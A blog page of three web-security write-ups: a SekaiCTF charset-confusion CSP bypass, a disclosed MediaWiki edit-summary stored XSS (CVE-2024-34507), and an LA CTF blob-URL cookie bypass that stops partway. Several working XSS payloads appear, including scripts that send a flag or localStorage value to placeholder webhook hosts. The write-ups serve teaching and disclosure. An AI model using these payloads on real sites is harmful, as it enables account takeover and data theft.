Showing posts with label write-up. Show all posts

Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

This is all evaluated at save time by converting the html to a data: url and passing it to puppeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If its in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

Turns out, the answer is no. Per the HTML5 spec, if you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other than a comment (and DTDs/PIs) before the <head>.

I also thought about DOM clobbering, but it seemed pretty impossible given that document.querySelector() and === were used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if I redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect to, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

It's a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the validator and the ultimate viewer are the same program. Both are a web browser, and both support the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off, we can discard any encoding that always encodes <, > and " the way ascii would, which includes all the single-byte legacy encodings. Browsers have also intentionally removed support for some of the encodings that do not, due to the problems caused by the likes of UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUC-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polyglot document, as we can switch the modes on and off to change the meaning of a wide swath of text.
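To make the statefulness concrete, here is a rough sketch of the idea. It is a toy model and not a real ISO-2022-JP decoder: it only knows the two escape sequences used later in this post, and the function name asciiVisibleText is made up for illustration. It replaces everything that would be swallowed as Japanese text with dots, leaving only the parts an HTML parser would still see as ASCII.

```javascript
// Toy model of ISO-2022-JP statefulness (NOT a full decoder).
// Only two escape sequences are handled, the two used in this post:
//   ESC $ B  -> switch to the two-byte Japanese character set
//   ESC ( B  -> switch back to ASCII
const ESC = '\x1b';

function asciiVisibleText(input) {
  let mode = 'ascii';
  let out = '';
  let i = 0;
  while (i < input.length) {
    if (input.startsWith(ESC + '$B', i)) {
      mode = 'two-byte';
      i += 3;
    } else if (input.startsWith(ESC + '(B', i)) {
      mode = 'ascii';
      i += 3;
    } else if (mode === 'ascii') {
      out += input[i];
      i += 1;
    } else {
      // In two-byte mode the bytes are consumed as Japanese characters,
      // so none of them can act as HTML syntax. Mark them with a dot.
      out += '.';
      i += 1;
    }
  }
  return out;
}

const sample = 'a<b>' + ESC + '$B' + '<script>' + ESC + '(B' + '</b>';
console.log(asciiVisibleText(sample));
```

The point is that one short escape sequence changes how every following byte is read, until another escape sequence switches back.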

An Example

Note: throughout this post I will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

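The ^[$B sequence switches the decoder into its two-byte Japanese mode (strictly speaking this is the JIS X 0208 mode rather than the single-byte katakana one, but the effect is what matters here; the Nq that follows is simply the first two-byte character), and ^[(B changes it back to ASCII. Under windows-1252 these escape sequences have no special meaning, of course. Thus we have made a polyglot document that will give an alert box only in windows-1252 mode.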

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.
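If you would rather check this from a script than from the address bar, something like the following should work. It is only a sketch, and it assumes a runtime whose TextDecoder supports the legacy encodings (browsers do, and so does Node.js when it is built with full ICU data). It decodes the exact same bytes twice and checks whether a literal <script> tag survives.

```javascript
// The body shared by the two data: urls above.
const body =
  "%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');" +
  "%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E";

// Percent-decode into raw bytes (every decoded character here is below 0x80).
const bytes = Uint8Array.from(decodeURIComponent(body), (c) => c.charCodeAt(0));

// Same bytes, two different charsets.
const asLatin = new TextDecoder('windows-1252').decode(bytes);
const asJis = new TextDecoder('iso-2022-jp').decode(bytes);

console.log('windows-1252 sees <script>:', asLatin.includes('<script>'));
console.log('iso-2022-jp sees <script>:', asJis.includes('<script>'));
```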

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, chrome will start parsing immediately and guess the charset before the entire document has arrived.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, and add a charset declaration at the end for the other charset, under which the document looks benign. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
        <!-- é - Add a windows-1252 character to make sure early heuristics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.
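Writing 3000 filler comments and raw escape bytes by hand is no fun, so a small generator helps. The following is a sketch for Node.js and not the script I actually used; buildPolyglot, its parameters and the filler text are all made up for illustration. It assembles the same layout as the snippet above and returns raw bytes, so that é really is the single windows-1252 byte 0xE9.

```javascript
const ESC = '\x1b';

// Hypothetical helper that assembles the layout from the snippet above.
// scriptBody must be plain ASCII; fillerRepeats controls the padding size.
function buildPolyglot(scriptBody, fillerRepeats) {
  const html =
    '<html><head>' +
    '<!-- \xe9 -->' +                  // 0xE9 is é in windows-1252
    '<!-- ' + ESC + '$BNq -->' +       // iso-2022-jp: Japanese from here on
    '<script>' + scriptBody + '</script>' +
    '<!-- junk -->'.repeat(fillerRepeats) +
    '<!-- ' + ESC + '(B -->' +         // iso-2022-jp: back to ASCII
    '<meta http-equiv="Content-Security-Policy" content="default-src \'none\'">' +
    '<meta charset="iso-2022-jp">' +
    '</head><body></body></html>';
  // latin1 keeps every character as exactly one byte, so \xe9 stays 0xE9.
  return Buffer.from(html, 'latin1');
}

const page = buildPolyglot("alert('here');", 3000);
console.log(page.length + ' bytes');
```

How much filler is actually needed depends on the network path, so the repeat count is something to tune rather than a magic number.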

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out chrome will wait a certain amount of time before proceeding with parsing a partial response. The HTML5 spec gives the example of waiting for 1024 bytes or 500ms (whichever comes first), but it is unclear what chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64KB, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus I did another test, where I used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.
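The same trick works without php. Here is a rough Node.js equivalent, as a sketch only: createSlowServer and the port number are my own names and choices for illustration. It sends the first part of the page, waits, and then sends the rest, so the browser has to start parsing before the late <meta charset> shows up.

```javascript
const http = require('node:http');

// Hypothetical test server: sends the first part of the page, pauses,
// then sends the rest, mimicking flush(); sleep(1); in the php version.
function createSlowServer(firstPart, secondPart, delayMs) {
  return http.createServer((req, res) => {
    // No charset in the header, so the browser has to sniff or use <meta>.
    res.writeHead(200, { 'Content-Type': 'text/html' });
    res.write(firstPart);
    setTimeout(() => res.end(secondPart), delayMs);
  });
}

// Usage (port 8000 is an arbitrary choice):
// createSlowServer(head, tail, 1000).listen(8000);
```

Here head would be everything up to somewhere in the filler and tail the remainder, including the charset declaration.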

After several hours of trying to debug, I had thus realized I had solved the problem several hours ago :(. In any case the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to project Sekai for hosting a great CTF.

Saturday, March 30, 2024

MediaWiki edit summary XSS write-up

Back in January, I discovered a stored XSS vulnerability in core MediaWiki (T355538; CVE-2024-34507). Essentially by setting a specific edit summary when editing a page, you could run javascript (and take over the account of anyone viewing the edit summary, for example on the history page or recentchanges).

MediaWiki core is generally pretty good when it comes to security. There are many sketchy extensions, and sometimes there are issues where an admin might be able to run javascript, but by and large unauthenticated XSS vulns are fairly rare. I think the last one was CVE-2021-44858 from back in 2021. The next one before that was CVE-2017-8815 in 2017, which only applied to wikis configured to have a site language of certain languages (e.g. Serbian and Chinese). At least, those were the ones I found when looking through the list. Hopefully I didn't miss any. In any case, finding XSS triggerable by an unprivileged attacker in MediaWiki core is pretty hard.

So what is the bug? The proof of concept looks like this - Create an edit with the following edit summary:

[[Special:RecentChanges#%1b0000000|link1]] [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]]

This feels a bit random at first glance. How does it work?

The edit summary parser

Whenever you edit a page on MediaWiki, there is a box for your edit summary. This is essentially MediaWiki's version of a commit message.

Very little formatting is allowed in this summary. A major exception is links. You can link to other pages by enclosing the link in [[ and ]].

So this explains a little bit about the proof-of-concept - it involves 2 links. But why 2? It doesn't work with just 1. What is with the weird link targets? They are clearly abnormal, but they also don't look like typical XSS. There are no < or >, there aren't even any unclosed quotes.

Let's take a deeper look at how MediaWiki applies formatting to these edit summaries. The code where all this happens is includes/CommentFormatter/CommentParser.php.

The first thing we might notice is the following line in CommentParser::preprocessInternal: "// \x1b needs to be stripped because it is used for link markers"

In the proof of concept, the first part is [[Special:RecentChanges#%1b0000000|link1]], where %1b appears. This is a good hint that it has something to do with link markers, whatever those are.

Link markers

But what are link markers?

When MediaWiki makes a link, it needs to know whether the page being linked to exists or not, since missing pages use a red colour. The most natural way of doing this is, when encountering a link, to check in the DB whether or not the page exists.

However, there is a problem. When rendering a long page with a lot of links, we have to do a lot of DB lookups. The lookups are simple, but still go to a separate (albeit nearby) server. Each page to look up involves a local network request to fetch the page status. While that is happening, MW just sits and waits. This is all very fast, but even so it adds up a little bit if you have, say, 500 links on a page.

The solution to this problem was to batch the queries. Instead of immediately looking up the page, MW would put a small link marker in the page at that point and carry on. Once it is finished, it would look up all the links all at once, and then do another pass to replace all the link markers.

So this is what a link marker is, just a little marker to tell MW to come back to this spot later after it figured out if all the links exist. The format of this marker is \x1B<number> (So \x1B0000000 for the first one, \x1B0000001 for the second, and so on). \x1B is the ASCII escape character.
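As a rough illustration of the two-pass idea, here is a simplified model in javascript. To be clear, this is not MediaWiki's code (which is PHP and far more involved): renderLinks, the pageExists callback, the /wiki/ path and the markup it emits are all assumptions made up for the sketch, and it skips HTML escaping entirely.

```javascript
// Simplified model of deferred link rendering (not MediaWiki's real code).
const MARKER = /\x1b(\d{7})/g;

function renderLinks(text, pageExists) {
  const pending = [];
  // Pass 1: replace each [[Target|label]] with a numbered marker.
  const withMarkers = text.replace(
    /\[\[([^|\]]+)\|([^\]]+)\]\]/g,
    (_, target, label) => {
      pending.push({ target, label });
      return '\x1b' + String(pending.length - 1).padStart(7, '0');
    }
  );
  // One batched existence check for every collected target.
  const exists = pageExists(pending.map((p) => p.target));
  // Pass 2: swap each marker for the finished link.
  return withMarkers.replace(MARKER, (_, n) => {
    const { target, label } = pending[Number(n)];
    const cls = exists.has(target) ? '' : ' class="new"';
    return `<a href="/wiki/${target}"${cls}>${label}</a>`;
  });
}

// pageExists stands in for the single batched DB query.
const html = renderLinks('see [[A|a]] and [[B|b]]', () => new Set(['A']));
console.log(html);
```

Notice that pass 2 is a plain text replacement over the whole string. It has no idea whether a marker sits in normal text or somewhere it shouldn't be.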

Back to the PoC

This explains the first part of the proof of concept: [[Special:RecentChanges#%1b0000000|link1]] - the link target is a link marker. The code has a line:

                                // Fix up urlencoded title texts (copied from Parser::replaceInternalLinks)
                                if ( strpos( $match[1], '%' ) !== false ) {
                                        $match[1] = strtr(
                                                rawurldecode( $match[1] ),
                                                [ '<' => '&lt;', '>' => '&gt;' ]
                                        );
                                }


This normalizes titles that use percent encoding so that they contain the real characters. Thus the %1B gets replaced with an actual 0x1B byte. The code did try to strip 0x1B characters earlier, but at that point it was still just %1b and did not match the check.
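The ordering problem is easy to reproduce in miniature. This sketch is javascript rather than the real PHP, with decodeURIComponent standing in for rawurldecode and preprocess being a made-up name: the strip runs first, the decode second, so an encoded escape character sails through.

```javascript
// Order of operations in miniature: strip first, decode second.
function preprocess(summary) {
  // Step 1: remove raw ESC bytes so users cannot forge link markers.
  const stripped = summary.replace(/\x1b/g, '');
  // Step 2 (later, per link target): undo percent-encoding.
  return decodeURIComponent(stripped);
}

const target = preprocess('Special:RecentChanges#%1b0000000');
// JSON.stringify makes the otherwise invisible escape character visible.
console.log(JSON.stringify(target));
```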

We now have a link with a link marker inside of it. An important note here is that Special:RecentChanges is not a normal page. It is a special page. MediaWiki knows it exists without having to consult the database, so it does not get the link marker treatment. This is important because we cannot use it as a fake link marker if it gets replaced by a real link marker.

At this stage after inserting link markers, the proof of concept becomes the following string:

<a href="/w/index.php/Special:RecentChanges#\x1B0000000" title="Special:RecentChanges">link1</a> \x1B0000000

A link with a link marker inside it!

The second link

The \x1B0000000 is a stand in for [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]].

The replacement at the end is a normal replacement, and everything is fine. However there are now two replacements - there is also the replacement inside the link: href="/w/index.php/Special:RecentChanges#\x1B0000000"

This is the fake link marker that we contrived to get inserted. Unlike the normal link markers, this is inside an attribute. The replacement text assumes it is being inserted as normal HTML, not as an attribute. Since it is a full link that also has quotes inside it, the two layers of quotes will interfere with each other.

Once the replacements happen we get the following mangled HTML for our proof of concept:

<a href="/w/index.php/Special:RecentChanges#<a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>" title="Special:RecentChanges">link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

This obviously looks wrong, but it's a bit unclear how browsers interpret it. A little known fact about HTML - /'s can separate attributes so long as no equal signs have been encountered yet. After the browser hits the second " mark, it thinks the href attribute is closed and that the remaining text is some additional attributes. The browser essentially parses the above html as if it was:

<a href="/w/index.php/Special:RecentChanges#<a href=" w="" index.php="" Test#="" autofocus onfocus="alert(&quot;xss\n&quot;+document.domain)//&quot;" title="Test">link2</a>" title="Special:RecentChanges"&gt;link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

In other words, an <a> tag, that has an attribute named autofocus and an onfocus event handler. On page load, the link is automatically focused, which triggers the javascript in the onfocus attribute to run, allowing the attacker to do what they want.

Take aways

I think the major takeaway is that running regexes over partially parsed HTML is always scary. We've had similar issues in the past, for example T110143.

The general pattern we've used to fix this and similar issues is to make sure the replacement token has special characters that would be mangled if it appeared in an unexpected context. Concretely, we added " and ' to the token, which would get escaped if placed in an attribute, so the token no longer matches and is no longer replaced.
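Here is a small sketch of why that works. The marker format and helper names below are hypothetical (I am not reproducing the exact token MediaWiki uses), but the mechanism is the same: a marker that passes through attribute escaping stops looking like a marker.

```javascript
// Hypothetical marker format with quote characters baked in; the exact
// token MediaWiki uses may differ.
const MARKER = /\x1b"'(\d{7})/g;

function escapeAttribute(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const marker = '\x1b"\'0000000';
// A marker in normal text, and a forged one that ended up in an attribute.
const inText = 'see ' + marker;
const inAttr = '<a href="' + escapeAttribute('/wiki/X#' + marker) + '">x</a>';

const replaceMarkers = (html) => html.replace(MARKER, '<a href="/wiki/Y">y</a>');

console.log(replaceMarkers(inText));
console.log(replaceMarkers(inAttr) === inAttr);
```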

More generally though, I think this is a good example of why even a minimal CSP policy would be helpful.

CSP is a complex standard, that can do a lot of things and has a lot of pieces. One of the things it can do, is disable "unsafe-inline" javascript. This means javascript from attributes (like onfocus) and javascript URLs. Usually this also includes inline <script> tags without a nonce, but that part is optional. A key point here, is this also generally means you cannot execute javascript via .innerHTML anymore, which is a fairly common vector for XSS via javascript.

Normally disabling unsafe-inline would be part of a broader effort to secure javascript, however it's possible to take things a step at a time. This vulnerability would have been stopped just by disabling event attributes. A surprising portion of MediaWiki & extension XSS vulns [Excluding boring - an admin can change something in an unsafe way issues] involve just html attributes (or javascript: urls), which is a web feature that nobody really needs for legit reasons and is generally considered bad practise in normal usage. Even the most minimal CSP policy might really help MediaWiki's overall security posture against XSS vulns.

For more info about the vulnerability, please see the original report at https://phabricator.wikimedia.org/T355538.

Wednesday, February 21, 2024

LA CTF write up: ctf-wiki

Last weekend I participated in LA CTF 2024. This is how I solved one of the challenges: "ctf-wiki". It was solved by 38 teams and worth 483 points.

The challenge

The challenge was an XSS problem. You can view it at the LACTF github. We are given a website that you can log into. Once you log in, you can create and edit pages, including adding arbitrary HTML (The description parameter is output unescaped). There is also a /flag page which outputs a flag if you are logged in as the admin. Finally, there is an admin bot that you can give a URL to, which it will visit, while being logged in as the admin. There is a CSP policy, but it specifies img-src * which allows us to exfiltrate data in the file names of images we choose to load.

This is all a pretty standard setup for a CTF XSS challenge.

Normally you would solve a problem like this by injecting a script like this into one of the pages of the site:

<script>
fetch(
  'https://ctf-wiki.chall.lac.tf/flag',
  {method:'post'}
).then( t=>t.text() ).then( a => {
  b=new Image();
  b.src='https://MYWEBSERVERHERE/?flag='+encodeURI( a.substr( 0,50 ) );
} );
</script>

And convince the admin bot to visit the page this script has been injected into. Admin bot visits the page, executes script, loads the /flag endpoint, loads an image from my webserver with the flag in the URL (CSP was blocking cross-site fetch() but not cross-site image loads, so we exfiltrate using an image). I then check my apache access_log file, find the flag, easy-peasy.

However there is a catch.

The Twist

As I said before, there is a twist. You can only view pages on the site if logged out. Logged in users can edit pages but not view them.
 
The admin bot is logged into the site as the admin (so it can read /flag). If we send the admin bot to the page with the injected script, it just sees the edit page. It does not execute the script.

We can work around this a few ways. Since SameSite=Lax cookies are being used, we could load the site in an <iframe> from a different domain. SameSite=Lax is a security measure that means cookies are only loaded on top-level GET navigations, but not when a website is loaded as a subresource from a different "site". Another way to force being logged out is to simply add a period to the end of the domain - e.g. http://ctf-wiki.chall.lac.tf./ . An obscure feature of DNS is that it can be configured to automatically add "search domains" at the end of a domain name. Adding a period to the end of the domain name turns off this rarely used feature. The end result is that ctf-wiki.chall.lac.tf. and ctf-wiki.chall.lac.tf are separate domain names that point to the same place. Web browsers consider them to be totally separate websites which have separate cookies.

Thus I can point the admin bot to http://ctf-wiki.chall.lac.tf. (Plain http not https since the certificate won't match), and it will execute the script I insert into the site. Unfortunately there is another problem. The admin bot won't be logged in when fetching http://ctf-wiki.chall.lac.tf./flag, and it cannot read the contents of http://ctf-wiki.chall.lac.tf/flag either, since that would be a cross-domain request, which is prevented by the same origin policy.
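You can see the "separate website" part with nothing more than the standard URL parser. A quick sketch, using the challenge hostname from above:

```javascript
const real = new URL('http://ctf-wiki.chall.lac.tf/flag');
const dotted = new URL('http://ctf-wiki.chall.lac.tf./flag');

// The trailing dot is kept as part of the hostname...
console.log(real.hostname);
console.log(dotted.hostname);
// ...so the two URLs have different origins.
console.log(real.origin === dotted.origin);
```

Different origins mean separate cookie jars, which is what logs us out, and it is also why a script on the dotted domain cannot read a response from the real one.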

This is quite a catch-22. We can either be logged in, able to read the flag but not able to tell the browser to get it, or we can be logged out, able to tell the browser to fetch but not able to access the results. We need to be both logged in and logged out at the same time.

Popup windows

The natural solution to this problem would be a pop-up window. You could open the page with an injected script in an <iframe>. SameSite=Lax cookies are not sent to cross-site iframes, so we would be logged out in the <iframe> and execute the script. The script could use window.open() to open a pop-up window. Pop-up windows are a top-level GET navigation, so SameSite=Lax cookies will be sent, and we will be logged-in inside the pop-up. Since both the iframe and the pop-up are the same domain, they are allowed to communicate with each other; window.open() returns a window object for the pop-up, which the iframe can use to run scripts in the context of the pop-up window.
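The cookie rule doing all the work here can be boiled down to a few lines. This is a deliberately simplified model of SameSite=Lax and not how a browser implements it (real browsers have more cases and exceptions); the function and field names are made up for the sketch.

```javascript
// Simplified model of when a SameSite=Lax cookie is attached to a request.
function laxCookieSent({ requestIsSameSite, topLevelNavigation, method }) {
  // Same-site requests always get the cookie.
  if (requestIsSameSite) return true;
  // Cross-site requests only get it for top-level GET navigations.
  return topLevelNavigation && method === 'GET';
}

// The wiki framed from a different site: logged out.
console.log(laxCookieSent({ requestIsSameSite: false, topLevelNavigation: false, method: 'GET' }));
// A pop-up window is a top-level GET navigation: logged in.
console.log(laxCookieSent({ requestIsSameSite: false, topLevelNavigation: true, method: 'GET' }));
```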

There is only one problem - pop-up blockers. Modern browsers only allow pop-up windows if they are the result of a user action. Users have to click something. Scripts cannot create pop-up windows of their own volition.

It turns out that this is not entirely true for the contest. The admin bot had its pop-up blocker disabled, so I could have used pop-up windows. However, at the time I simply tested with my local copy of chrome, saw it didn't work, and assumed the admin bot would be the same. An important lesson here: you should always test your assumptions. Nonetheless, let's pretend that wasn't the case. Can we solve this problem without using pop-ups?

The challenge on hard mode: no pop-ups

Without pop-ups, we essentially only have <iframe>s and navigating the entire page. There are two browser features that present a challenge here:

  • SameSite=Lax cookies: This is designed so that no cookies are ever sent from requests originating cross-site except for top level GET navigations.
  • Cache partitioning - Browsers are becoming more and more concerned with user tracking. To combat this they have implemented cache partitioning. Essentially, caches are partitioned so that an <iframe> of some domain has a totally separate cache from a top level navigation to that domain. This includes APIs like ServiceWorkers that you might be able to use to control other pages on the same domain. It also includes cookies. The exact details of this varies between browsers.
This was looking pretty hopeless. After all, the entire point of cache partitioning was to prevent communication between third-party iframes and their main site. I didn't just want to communicate from a third-party iframe to its originating site, I wanted to control the originating site from the third-party website, which seems much harder than mere communication. If there was a way to communicate, it would break the entire point of the cache partitioning feature.
 
After much googling, I eventually came across the google chrome privacy sandbox docs. It had the following enticing line:

A blob is an object that contains raw data to be processed, and a blob URL can be generated to access the resource. Blob URL stores are not partitioned. To support a use case for navigating in a top-level context to any blob URL (discussion), the blob URL store might be partitioned by the agent cluster instead of the top-level site. This feature is not be available for testing yet, and the partitioning mechanism may change in the future.

 

An exception to cache partitioning! That sounds exactly like what I needed.

What is a blob url anyways?

A blob url is kind of like a fancy data: url. They are generally of the form blob:origin/UUID. For example: blob:http://example.com/1c18cbfc-cb5a-4709-9fd4-f50bb96ab7b7. They reference some bytes associated with a specific page, and generally only last so long as the page they are associated with exists. You can use them like data: urls, for example in the src attribute of an <img> tag. Unlike data urls, blob urls don't embed the data within themselves but just reference it with a UUID, which can be helpful for large files. Normally you create them with the URL.createObjectURL() javascript API, which takes a Blob object and outputs a blob url.

The exciting part is:
  • Unlike data: urls, Blob urls have the same origin as the page that creates them.
  • Blob urls are exempt (for the moment at least) from cache partitioning and work across third-party contexts.
  • You can use blob urls to do top-level navigation. (data: urls have been banned from script based top level navigation)

Putting this all together, we can create a blob url from inside an iframe containing HTML of our choosing, navigate the entire page to the blob url with our HTML, which then executes as if it was top level. This means that it can send SameSite cookies as well as being considered in the same cache partition as the main site (unlike the <iframe>). Hence we are logged in, inside this blob: url.

Putting it all together

To pull this off, we'll have two pages on the ctf-wiki, the actual script and an iframe wrapper.

The iframe wrapper simply looks like this. We would visit it from the extra dot url to be logged out:

 <iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf"></iframe>

The page it wraps is the interesting one:

<script>
 parent.location = URL.createObjectURL(
    new Blob( [
      "<script>" +
      "fetch('https://ctf-wiki.chall.lac.tf/flag',{method:'post'})" +
        ".then(t=>t.text())" +
        ".then(flag => { " +
            "var img = new Image();" +
            "img.src = 'https://MYWEBSITEHERE/?flag='+encodeURI(flag.substr(0,50))" +
         "});" +
       "\x3C/script\x3E"
    ], 
    {type: "text/html"}
    )
 )
</script>

This script creates a blob url. The blob url contains an HTML page with a script that fetches the flag and exfiltrates it to my server. It then navigates the parent window (i.e. not the <iframe> we are inside, but the page containing it) to this blob url. The blob url will then execute in a top level context with the same origin as the <iframe>. It will fetch the flag, and then send that value to my server as an image load request.

So I tried it. It didn't work :(

Looking at the browser console, I had an error saying iframes are not allowed to navigate the top window without the user clicking on something. At first, I thought the approach was dead, but then I remembered that the sandbox attribute for <iframe>s had something related to this.

